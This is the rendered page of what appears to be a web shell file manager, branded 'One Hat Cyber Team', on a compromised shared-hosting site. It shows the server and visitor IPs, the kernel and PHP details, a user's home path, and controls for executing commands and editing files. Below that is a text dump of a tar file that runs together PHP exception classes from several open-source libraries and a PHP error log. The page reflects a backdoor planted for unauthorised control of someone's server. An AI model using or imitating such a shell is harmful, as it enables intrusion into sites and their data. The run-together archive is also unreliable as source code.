One Hat Cyber Team
Your IP:
216.73.216.48
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
proc
/
self
/
root
/
home
/
fluxyjvi
/
www
/
assets
/
images
/
Edit File:
Exception.tar
Exception.php 0000644 00000000541 15107350321 0007210 0 ustar 00 <?php declare(strict_types=1); /* * This file is part of sebastian/diff. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace SebastianBergmann\Diff; use Throwable; interface Exception extends Throwable { } ConfigurationException.php 0000644 00000001676 15107350321 0011752 0 ustar 00 <?php declare(strict_types=1); /* * This file is part of sebastian/diff. * * (c) Sebastian Bergmann <sebastian@phpunit.de> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace SebastianBergmann\Diff; use function gettype; use function is_object; use function sprintf; use Exception; final class ConfigurationException extends InvalidArgumentException { public function __construct( string $option, string $expected, $value, int $code = 0, Exception $previous = null ) { parent::__construct( sprintf( 'Option "%s" must be %s, got "%s".', $option, $expected, is_object($value) ? $value::class : (null === $value ? '<null>' : gettype($value) . '#' . $value) ), $code, $previous ); } } InvalidArgumentException.php 0000644 00000001053 15107350321 0012221 0 ustar 00 <?php declare(strict_types=1); namespace Money\Exception; use InvalidArgumentException as CoreInvalidArgumentException; use Money\Exception; final class InvalidArgumentException extends CoreInvalidArgumentException implements Exception { /** @psalm-pure */ public static function divisionByZero(): self { return new self('Cannot compute division with a zero divisor'); } /** @psalm-pure */ public static function moduloByZero(): self { return new self('Cannot compute modulo with a zero divisor'); } } TimeSourceException.php 0000644 00000001104 15107364470 0011216 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that the source of time encountered an error */ class TimeSourceException extends PhpRuntimeException implements UuidExceptionInterface { } InvalidUuidStringException.php 0000644 00000001267 15107364470 0012555 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; /** * Thrown to indicate that the string received is not a valid UUID * * The InvalidArgumentException that this extends is the ramsey/uuid version * of this exception. It exists in the same namespace as this class. */ class InvalidUuidStringException extends InvalidArgumentException implements UuidExceptionInterface { } NameException.php 0000644 00000001131 15107364470 0010017 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that an error occurred while attempting to hash a * namespace and name */ class NameException extends PhpRuntimeException implements UuidExceptionInterface { } InvalidBytesException.php 0000644 00000001122 15107364470 0011534 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that the bytes being operated on are invalid in some way */ class InvalidBytesException extends PhpRuntimeException implements UuidExceptionInterface { } UnsupportedOperationException.php 0000644 00000001111 15107364470 0013346 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use LogicException as PhpLogicException; /** * Thrown to indicate that the requested operation is not supported */ class UnsupportedOperationException extends PhpLogicException implements UuidExceptionInterface { } DceSecurityException.php 0000644 00000001143 15107364470 0011365 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate an exception occurred while dealing with DCE Security * (version 2) UUIDs */ class DceSecurityException extends PhpRuntimeException implements UuidExceptionInterface { } RandomSourceException.php 0000644 00000001362 15107364470 0011546 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that the source of random data encountered an error * * This exception is used mostly to indicate that random_bytes() or random_int() * threw an exception. However, it may be used for other sources of random data. */ class RandomSourceException extends PhpRuntimeException implements UuidExceptionInterface { } DateTimeException.php 0000644 00000001124 15107364470 0010635 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that the PHP DateTime extension encountered an exception/error */ class DateTimeException extends PhpRuntimeException implements UuidExceptionInterface { } BuilderNotFoundException.php 0000644 00000001104 15107364470 0012202 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that no suitable builder could be found */ class BuilderNotFoundException extends PhpRuntimeException implements UuidExceptionInterface { } UnableToBuildUuidException.php 0000644 00000001102 15107364470 0012455 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate a builder is unable to build a UUID */ class UnableToBuildUuidException extends PhpRuntimeException implements UuidExceptionInterface { } NodeException.php 0000644 00000001123 15107364470 0010025 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use RuntimeException as PhpRuntimeException; /** * Thrown to indicate that attempting to fetch or create a node ID encountered an error */ class NodeException extends PhpRuntimeException implements UuidExceptionInterface { } UuidExceptionInterface.php 0000644 00000000666 15107364470 0011702 0 ustar 00 <?php /** * This file is part of the ramsey/uuid library * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. * * @copyright Copyright (c) Ben Ramsey <ben@benramsey.com> * @license http://opensource.org/licenses/MIT MIT */ declare(strict_types=1); namespace Ramsey\Uuid\Exception; use Throwable; interface UuidExceptionInterface extends Throwable { } MalformedUriException.php 0000644 00000000365 15107450030 0011521 0 ustar 00 <?php declare(strict_types=1); namespace GuzzleHttp\Psr7\Exception; use InvalidArgumentException; /** * Exception thrown if a URI cannot be parsed because it's malformed. */ class MalformedUriException extends InvalidArgumentException { } UnknownCurrencyException.php 0000644 00000000406 15107560401 0012305 0 ustar 00 <?php declare(strict_types=1); namespace Money\Exception; use DomainException; use Money\Exception; /** * Thrown when trying to get ISO currency that does not exists. */ final class UnknownCurrencyException extends DomainException implements Exception { } ParserException.php 0000644 00000000373 15107560401 0010372 0 ustar 00 <?php declare(strict_types=1); namespace Money\Exception; use Money\Exception; use RuntimeException; /** * Thrown when a string cannot be parsed to a Money object. */ final class ParserException extends RuntimeException implements Exception { } UnresolvableCurrencyPairException.php 0000644 00000001422 15107560401 0014122 0 ustar 00 <?php declare(strict_types=1); namespace Money\Exception; use InvalidArgumentException; use Money\Currency; use Money\Exception; use function sprintf; /** * Thrown when there is no currency pair (rate) available for the given currencies. */ final class UnresolvableCurrencyPairException extends InvalidArgumentException implements Exception { /** * Creates an exception from Currency objects. */ public static function createFromCurrencies(Currency $baseCurrency, Currency $counterCurrency): UnresolvableCurrencyPairException { $message = sprintf( 'Cannot resolve a currency pair for currencies: %s/%s', $baseCurrency->getCode(), $counterCurrency->getCode() ); return new self($message); } } FormatterException.php 0000644 00000000403 15107560401 0011073 0 ustar 00 <?php declare(strict_types=1); namespace Money\Exception; use Money\Exception; use RuntimeException; /** * Thrown when a Money object cannot be formatted into a string. */ final class FormatterException extends RuntimeException implements Exception { } error_log 0000644 00000002057 15107560401 0006464 0 ustar 00 [19-Nov-2025 19:40:11 UTC] PHP Fatal error: Uncaught Error: Interface "Money\Exception" not found in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/InvalidArgumentException.php:10 Stack trace: #0 {main} thrown in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/InvalidArgumentException.php on line 10 [19-Nov-2025 20:11:15 UTC] PHP Fatal error: Uncaught Error: Interface "Money\Exception" not found in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/UnresolvableCurrencyPairException.php:16 Stack trace: #0 {main} thrown in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/UnresolvableCurrencyPairException.php on line 16 [20-Nov-2025 05:19:39 UTC] PHP Fatal error: Uncaught Error: Interface "Money\Exception" not found in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/UnknownCurrencyException.php:13 Stack trace: #0 {main} thrown in /home/fluxyjvi/public_html/project/vendor/moneyphp/money/src/Exception/UnknownCurrencyException.php on line 13
Simpan